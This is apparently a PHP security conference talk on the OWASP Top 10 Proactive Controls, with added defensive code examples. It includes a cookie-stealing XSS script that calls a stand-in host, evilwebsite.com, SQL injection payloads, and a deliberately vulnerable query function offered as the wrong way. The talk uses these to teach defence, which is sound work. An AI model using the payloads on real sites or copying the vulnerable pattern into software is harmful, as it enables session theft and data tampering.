OWASP Top 10 Proactive Controls
Katy Anton, @katyanton, October 2016
PHPNW16
OWASP Top 10 Risks - 2013

A1 - Injection
A2 - Broken Authentication and Session Management
A3 - Cross Site Scripting (XSS)
A4 - Insecure Direct Object References
A5 - Security Misconfiguration
A6 - Sensitive Data Exposure
A7 - Missing Function Level Access Control
A8 - Cross-Site Request Forgery (CSRF)
A9 - Using Components with Known Vulnerabilities
A10 - Unvalidated Redirects and Forwards
Katy Anton

• Software development background
• Certified Secure Software Lifecycle Professional (CSSLP)
• Application Security Consultant @Veracode
• OWASP Bristol Chapter Leader
• Project Co-Leader for OWASP Top 10 Proactive Controls

@katyanton
https://www.linkedin.com/in/katyanton
Cyber attacks 2015 - 2016

Symfony implementation
Disclosure of information
SQL Injection

New Website

OWASP Application Security Verification Standard (ASVS)
C1. Verify for Security Early and Often

• Choose the level of security for your application
• Security requirements and tests - OWASP ASVS
• Verify for Security Early and Often (OWASP ZAP - continuous integration)

Proactive Control: C1. Verify for security early and often
Risks prevented: All OWASP Top 10 Risks!
SQL injection example

$email = "'; -- @owasp.org";
$sql = "UPDATE user SET email='$email' WHERE id='1'";

Becomes

UPDATE user SET email=''; -- @owasp.org' WHERE id='1'
C2. Parameterize Queries

Parameterized queries prevent untrusted input from being interpreted as part of a SQL command.

C2. Control: Data Access Layer

Example of query parametrisation in PHP, how not to do it!

<?php
$stmt = $dbh->prepare("UPDATE users SET email = {$_GET['email']} WHERE id = $id");
$stmt->execute();

C2: How NOT to

$sql = "UPDATE users SET email = {$_GET['email']} WHERE id = $id";

This one string combines both the code and the input. The SQL parser cannot differentiate between code and user input, and calling prepare() on an already-interpolated string gives no protection.
C2. Control: Data Access Layer

PHP: Query Parametrization - Correct Usage

<?php
$stmt = $dbh->prepare("UPDATE users SET email = :new_email WHERE id = :user_id");
$stmt->bindParam(':new_email', $email);
$stmt->bindParam(':user_id', $id);
$stmt->execute();

Proactive Control: C2. Parameterize Queries
Risks prevented: A1. Injection
XSS example

<script type="text/javascript">
var adr = 'http://evilwebsite.com/send.php?cakemonster=' + escape(document.cookie);
var img = new Image();
img.src = adr;
</script>
C3. Encode Your Output

C3: Controls - Contextual Encoding

Symfony 2+: Twig
ZF2: ZendEscaper

Proactive Control: C3. Encode Output
Risks prevented: A1. Injection; A3. XSS
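Contextual encoding in plain PHP, as an added example that is not from the slides: it does by hand what Twig's autoescaping and ZendEscaper do inside templates, using a constructed untrusted value shaped like the cookie-stealing script above.

```php
<?php
// Added example (not from the slides): contextual output encoding in plain PHP,
// the job Twig's autoescaping and ZendEscaper do inside their templates.
// Each output context needs its own encoder; one encoder does not fit all.

// HTML text and double-quoted attribute values
function encodeHtml(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// A JavaScript string literal inside <script>: JSON-encode, and hex-escape
// < > & ' " as well so the value can never close the <script> element
function encodeJs(string $s): string
{
    return json_encode($s, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
}

// Constructed untrusted value, shaped like the slide's cookie-stealing payload
$name = '<script>new Image().src="http://evilwebsite.com/send.php?c=" + document.cookie</script>';

// Right encoder for each sink: the browser shows the text instead of running it
echo '<p>Hello, ' . encodeHtml($name) . "</p>\n";
echo '<input value="' . encodeHtml($name) . "\">\n";
echo '<script>var name = ' . encodeJs($name) . ";</script>\n";

// htmlspecialchars() is the wrong tool for the JavaScript sink: it changes the
// value (quotes become &quot;) and escapes neither backslashes nor line breaks,
// so the encoder is chosen by sink (HTML, attribute, JS, URL), never by habit.
```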
C4. Validate All Input

C4: Example of Validations

• GET / POST data (including hidden fields)
• File uploads
• HTTP Headers
• Cookies
• Database

C4: Controls

PHP filter extension, available as standard since v5.2.
Example of both validation and sanitisation:

<?php
$sanitised_url = filter_var($url, FILTER_SANITIZE_URL);
if (filter_var($sanitised_url, FILTER_VALIDATE_URL)) {
    echo "This is a valid URL.";
}
Input Validation Prevents 2nd Order SQL Injection

Register form:
• Two users: "john" and "john'--"
• Username value "john'--" becomes the SQL injection payload

Register form fields: Username (john'--), Password

Change password form, logged in as john'--:
Current Password, New Password, New Password (repeat)

2nd Order SQL Injection Example

UPDATE users SET password='123' WHERE username='john'--' and password='abc'

Becomes

UPDATE users SET password='123' WHERE username='john'
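The register/change-password scenario above run end to end, as an added example that is not from the slides, covering both C2 (parameterised queries) and C4 (input validation): it uses an in-memory SQLite database through PDO, and the username allow-list pattern is an assumed policy.

```php
<?php
// Added example (not from the slides): second-order SQL injection in the
// change-password flow of the register/change-password example, with an
// in-memory SQLite database via PDO. The vulnerable and the parameterised
// version run side by side. Passwords are kept in clear text only to mirror
// the slide's query; real code stores password_hash() output (see C5).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)');

// Registration with a prepared statement stores the odd username verbatim and
// harmlessly: the payload only fires when the value is read back and reused.
$reg = $db->prepare('INSERT INTO users (username, password) VALUES (:u, :p)');
$reg->execute([':u' => 'john',    ':p' => 'abc']);
$reg->execute([':u' => "john'--", ':p' => 'xyz']);

// How NOT to do it: the username comes from the session, is treated as trusted
// because it came from the database, and is concatenated into the SQL text.
function vulnerableChangePassword(PDO $db, string $user, string $current, string $new): int
{
    $sql = "UPDATE users SET password='$new' WHERE username='$user' AND password='$current'";
    return $db->exec($sql);   // rows changed
}

// Correct (C2): every value is bound as a parameter, whatever its origin.
function safeChangePassword(PDO $db, string $user, string $current, string $new): int
{
    $stmt = $db->prepare('UPDATE users SET password=:new WHERE username=:u AND password=:cur');
    $stmt->execute([':new' => $new, ':u' => $user, ':cur' => $current]);
    return $stmt->rowCount();
}

// C4 at the front door: an allow-list for usernames (assumed policy: 3-20
// letters, digits or underscores) rejects "john'--" at registration time.
function isValidUsername(string $u): bool
{
    return preg_match('/^[A-Za-z0-9_]{3,20}$/', $u) === 1;
}

// Logged in as "john'--", supplying a wrong current password:
$rows = vulnerableChangePassword($db, "john'--", 'wrong', '123');
echo "vulnerable: $rows row(s) changed\n";   // "--" drops the password check, john's row is hit
$rows = safeChangePassword($db, "john'--", 'wrong', '123');
echo "parameterised: $rows row(s) changed\n";   // WHERE clause stays intact, nothing matches
var_dump(isValidUsername("john'--"));
var_dump(isValidUsername('john'));
```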
Proactive Control: C4. Validate All Input
Risks prevented: A1. Injection; A3. XSS; A10. Unvalidated redirects & forwards
New Website

C1 Verify for Security Early and Often
C2 Parametrize Queries
C3 Encode Data
C4 Validate Input
C5. Implement Identity and Authentication Control

C5: Best practices

• Secure Password Storage
• Multi-Factor Authentication
• Secure Password Recovery Mechanism
• Transmit sensitive data only over TLS (v1.2)
• Error Messages
• Prevent Brute-Force Attacks

C5. PHP Password storage

• password_hash("my_password", PASSWORD_DEFAULT)
• since PHP v5.5
• compatibility library for versions < 5.5

C5. Password storage - How Not To

$password = bcrypt([salt] + [password], work_factor);
$loginkey = md5(lc([username]) . "::" . lc([password]));

Be consistent when storing sensitive data!

C5. Forgot Password

Forgot password design:
1. Ask one or more security questions
2. Send the user a randomly generated token
3. Verify the token in the same web session
4. Change the password

Resources: https://www.owasp.org/index.php/Forgot_Password_Cheat_Sheet

C5. Error messages

Error messages must be identical, at both the HTTP and the HTML level, for a valid user and for a not-registered user.
How not to do it: a different error message for a valid user than for a not-registered user.

Proactive Control: C5. Establish Identity and Authentication Controls
Risks prevented: A2. Broken Authentication and Session Management
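Password storage with password_hash() and a login check with a single failure message, as an added example that is not from the slides; the $users array stands in for the database table and the users and passwords are constructed for the demo.

```php
<?php
// Added example (not from the slides): password storage with password_hash()
// and a login check whose failure response is identical whether the username
// is unknown or the password is wrong. The $users array stands in for the
// database table; the users and passwords below are constructed for the demo.
const LOGIN_FAILED = 'Invalid username or password.';

function registerUser(array &$users, string $username, string $password)
{
    // PASSWORD_DEFAULT is bcrypt today and may change in later PHP versions;
    // the salt and cost are embedded in the hash, so nothing else is stored.
    $users[$username] = password_hash($password, PASSWORD_DEFAULT);
}

// Returns null on success or the one generic failure string.
function login(array &$users, string $username, string $password)
{
    // When the user does not exist, verify against a throw-away hash anyway so
    // the unknown-user path takes the same time as a wrong-password path.
    static $dummyHash = null;
    if ($dummyHash === null) {
        $dummyHash = password_hash('dummy-' . bin2hex(random_bytes(8)), PASSWORD_DEFAULT);
    }
    $known = isset($users[$username]);
    $hash = $known ? $users[$username] : $dummyHash;
    if (!password_verify($password, $hash) || !$known) {
        return LOGIN_FAILED;   // same text, same HTTP status, for both failures
    }
    // Upgrade stored hashes transparently when the cost or algorithm changes.
    if (password_needs_rehash($hash, PASSWORD_DEFAULT)) {
        $users[$username] = password_hash($password, PASSWORD_DEFAULT);
    }
    return null;
}

$users = [];
registerUser($users, 'john', 'correct horse battery staple');
echo login($users, 'john', 'correct horse battery staple') ?? 'login ok', "\n";
echo login($users, 'john', 'wrong password') ?? 'login ok', "\n";
echo login($users, 'nobody', 'wrong password') ?? 'login ok', "\n";   // same message as above
```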
C6. Implement Appropriate Access Controls

C6: Best Practices

• Deny by default
• Least privilege
• Force all requests to go through access control checks
• Check on the server when each function is accessed

C6: Role vs Resource based ACLs

Resource based:

if (user.isPermitted("project:view:123")) {
    // show the project report button
} else {
    // don't show the button
}

Role based:

if (user.hasRole("Project Manager")) {
    // show the project report button
} else {
    // don't show the button
}

if (user.hasRole("Project Manager") || user.hasRole("Admin")) {
    // show the project report button
} else {
    // don't show the button
}

Proactive Control: C6. Implement Appropriate Access Controls
Risks prevented: A4. Insecure Direct Object References; A7. Missing Function Level Access Control
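A deny-by-default, resource-based isPermitted() check in PHP, as an added example that is not from the slides; the "domain:action:instance" permission strings follow the slide's "project:view:123", and the User class, its grants and the wildcard rule are assumptions of this example.

```php
<?php
// Added example (not from the slides): a deny-by-default, resource-based
// permission check using "domain:action:instance" strings as in the slide's
// "project:view:123". A grant may use "*" for any part; a grant with fewer
// parts than the request never matches (no implicit wildcard).
final class User
{
    private $grants;

    public function __construct(array $grants)
    {
        $this->grants = $grants;
    }

    // True only if some grant covers every part of the requested permission.
    public function isPermitted(string $permission): bool
    {
        $want = explode(':', $permission);
        foreach ($this->grants as $grant) {
            $have = explode(':', $grant);
            if (count($have) !== count($want)) {
                continue;
            }
            $match = true;
            foreach ($want as $i => $part) {
                if ($have[$i] !== '*' && $have[$i] !== $part) {
                    $match = false;
                    break;
                }
            }
            if ($match) {
                return true;
            }
        }
        return false;   // deny by default: no matching grant, no access
    }
}

// The check runs on the server for every request, regardless of whether the
// UI showed the button; hiding the button is not access control.
function projectReport(User $user, int $projectId): string
{
    if (!$user->isPermitted("project:view:$projectId")) {
        http_response_code(403);
        return 'Forbidden';
    }
    return "report for project $projectId";
}

$pm = new User(['project:view:123', 'project:edit:123']);   // one project only
$admin = new User(['project:*:*']);
echo projectReport($pm, 123), "\n";
echo projectReport($pm, 124), "\n";   // changing the id in the URL is refused
echo projectReport($admin, 124), "\n";
```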
C7. Protect Data

C7 Controls: Data in transit

Data in transit: HTTPS
• Confidentiality: a spy cannot view your data
• Integrity: a spy cannot change your data
• Authenticity: the server you visit is the right one

MITM Protection - HSTS
• HTTPS + Strict-Transport-Security header

C7 Controls: Data at rest

1. Algorithm: AES (Advanced Encryption Standard)
2. Secure key management
3. Adequate access controls and auditing

Proactive Control: C7. Protect Data
Risks prevented: A6. Sensitive Data Exposure
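AES for data at rest with the key kept out of the code base, as an added example that is not from the slides: it uses PHP's OpenSSL extension (AES-256-GCM, PHP 7.1+), and the APP_DATA_KEY environment variable is an assumed stand-in for a key-management service.

```php
<?php
// Added example (not from the slides): AES-256-GCM for data at rest with PHP's
// OpenSSL extension. The key comes from outside the code (an environment
// variable here, standing in for a key-management service); a fresh random
// nonce is generated per record and stored with it. GCM's tag gives integrity.
function loadKey(): string
{
    $hex = getenv('APP_DATA_KEY');   // assumed: 64 hex chars = 32-byte key
    if ($hex === false || strlen($hex) !== 64 || !ctype_xdigit($hex)) {
        throw new RuntimeException('APP_DATA_KEY missing or not a 32-byte hex key');
    }
    return hex2bin($hex);
}

// Returns base64(nonce || tag || ciphertext).
function encryptRecord(string $plaintext, string $key): string
{
    $nonce = random_bytes(12);
    $tag = '';
    $ct = openssl_encrypt($plaintext, 'aes-256-gcm', $key, OPENSSL_RAW_DATA, $nonce, $tag);
    if ($ct === false) {
        throw new RuntimeException('encryption failed: ' . openssl_error_string());
    }
    return base64_encode($nonce . $tag . $ct);
}

function decryptRecord(string $blob, string $key): string
{
    $raw = base64_decode($blob, true);
    if ($raw === false || strlen($raw) < 28) {
        throw new RuntimeException('stored record is malformed');
    }
    $nonce = substr($raw, 0, 12);
    $tag = substr($raw, 12, 16);
    $ct = substr($raw, 28);
    $pt = openssl_decrypt($ct, 'aes-256-gcm', $key, OPENSSL_RAW_DATA, $nonce, $tag);
    if ($pt === false) {
        throw new RuntimeException('decryption failed: wrong key or tampered record');
    }
    return $pt;
}

putenv('APP_DATA_KEY=' . bin2hex(random_bytes(32)));   // constructed for the demo only
$key = loadKey();
$blob = encryptRecord('card ending 4242', $key);
echo decryptRecord($blob, $key), "\n";
// Integrity: flipping one byte of the stored record fails closed instead of
// quietly returning garbage.
$raw = base64_decode($blob);
$raw[strlen($raw) - 1] = chr(ord($raw[strlen($raw) - 1]) ^ 0x01);
try {
    decryptRecord(base64_encode($raw), $key);
} catch (RuntimeException $e) {
    echo $e->getMessage(), "\n";
}
```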
New Website

C1 Verify for Security Early and Often
C2 Parametrize Queries
C3 Encode Data
C4 Validate Input
C5 Authentication
C6 Access Controls
C7 Protect Data

C8. Implement Logging and Intrusion Detection

Proactive Control: C8. Logging and Intrusion Detection
Risks prevented: All OWASP Top 10 Risks!
C9. Leverage Security Frameworks and Libraries

C9: Examples

• Framework with CSRF protection
• Framework with XSS protection
• ORM - SQL injection prevention
• Vetted cryptographic algorithm

C9: Best Practices

• Use trusted sources
• Low coupling (low coupling == reduced attack surface)
• Update regularly / replace

Proactive Control: C9. Leverage Security Frameworks and Libraries
Risks prevented: All OWASP Top 10 Risks!
C10. Error and Exception Handling

C10: Best Practices

• Centralised error handling
• Verbose enough to explain the issue
• Don't leak critical information

Proactive Control: C10. Error and Exception Handling
Risks prevented: All OWASP Top 10 Risks!
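The three C10 practices in one PHP handler, as an added example that is not from the slides: full detail goes to the error log (which also feeds C8), and the client only ever sees a generic message with a correlation id; the database error string at the end is constructed.

```php
<?php
// Added example (not from the slides): one central handler for errors and
// exceptions in PHP. Full detail goes to the error log (C8); the client gets a
// generic message plus a correlation id to quote to support, and never a path,
// a query, a stack trace or a database error string.
ini_set('display_errors', '0');   // PHP notices and warnings never reach the browser
ini_set('log_errors', '1');

function handleUncaught(Throwable $e)
{
    $ref = bin2hex(random_bytes(8));   // correlation id, also on the log line
    error_log(sprintf('[%s] %s: %s in %s:%d', $ref, get_class($e), $e->getMessage(),
        $e->getFile(), $e->getLine()));
    http_response_code(500);
    echo "Something went wrong. Reference: $ref\n";
}

// Route PHP warnings and notices through the same path as exceptions.
set_error_handler(function (int $no, string $str, string $file, int $line) {
    throw new ErrorException($str, 0, $no, $file, $line);
});
set_exception_handler('handleUncaught');

// Constructed failure: a database driver message like this one names the
// account and the host, which is exactly what must stay out of the response.
throw new RuntimeException("SQLSTATE[HY000] [1045] Access denied for user 'app'@'db01'");
```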
New Website

C1 Verify for Security Early and Often
C2 Parametrize Queries
C3 Encode Data
C4 Validate Input
C5 Authentication
C6 Access Controls
C7 Protect Data
C8 Logging
C9 Leverage Security Frameworks
C10 Error Handling

It's a Start To Secure Software by Default!

Reference

OWASP Proactive Controls Project:
https://www.owasp.org/index.php/OWASP_Proactive_Controls

Thank you
